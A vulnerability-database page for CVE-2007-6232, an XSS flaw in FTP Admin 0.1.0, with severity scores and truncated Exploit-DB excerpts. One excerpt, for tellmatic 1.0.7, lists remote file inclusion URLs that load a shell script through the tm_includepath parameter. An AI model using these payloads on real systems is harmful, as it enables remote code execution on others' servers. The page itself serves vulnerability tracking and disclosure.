CVE-2007-6232
published 2007-12-04CVE-2007-6232: Cross-site scripting (XSS) vulnerability in index.php in FTP Admin 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter…
PriorityP416medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.55%
72.1th percentile
Cross-site scripting (XSS) vulnerability in index.php in FTP Admin 0.1.0 allows remote attackers to inject arbitrary web script or HTML via the error parameter in an error page action.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ftp | admin | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
tellmatic 1.0.7 - Multiple Remote File Inclusions
exploitdb·2007-12-01
CVE-2007-6232 tellmatic 1.0.7 - Multiple Remote File Inclusions
tellmatic 1.0.7 - Multiple Remote File Inclusions
---
~~~~~~~~~~~~~~~~~~~~~~
~ tellmatic 1.0.7 RFI ~
~~~~~~~~~~~~~~~~~~~~~~
Author : ShAy6oOoN
Group : PitBull Crew
Script : tellmatic 1.0.7
Download : http://downloads.sourceforge.net/tellmatic/tellmatic-1.0.7.tgz?modtime=1196381865&big_mirror=0
Vulnerability Type : Remote File Inclusion
Method : get
Register_globals : On
Exploit URL's :
http://localhost/tellmatic/include/Classes.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/statistic.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tellmatic/include/status_top_x.inc.php?tm_includepath=http://localhost/shell.txt?
http://localhost/tell
Exploit-DB
ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass
exploitdb·2007-11-29
CVE-2007-6234 ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass
ftp Admin 0.1.0 - Local File Inclusion / Cross-Site Scripting / Authentication Bypass
---
FTP Admin v0.1.0 - MULTIPLE VULNERABILITIES
by Omni
1) Infos
Date : 2007-11-28
Product : FTP Admin
Version : v0.1.0
Vendor : http://sourceforge.net/projects/ftpadmin/
Vendor Status : 2007-11-30 Informed!
Description : FTP admin is a web-based user administration tool, for usage in combination with vsftpd. FTP admin
requires sudo. Features include modification of users and generation of user passwords.
Source : omnipresent - omni
E-mail : omnipresent[at]NOSPAMemail[dot]it - omni[at]NOSPAMplayhack[dot]net
Team : Playhack.net Security
2) Security Issues
--- [ XSS ] ---
I think that is better let you see a PoC instead of explain where is the bug.. If you want to know it just look at the
source cod
No writeups or analysis indexed.
2007-12-04
Published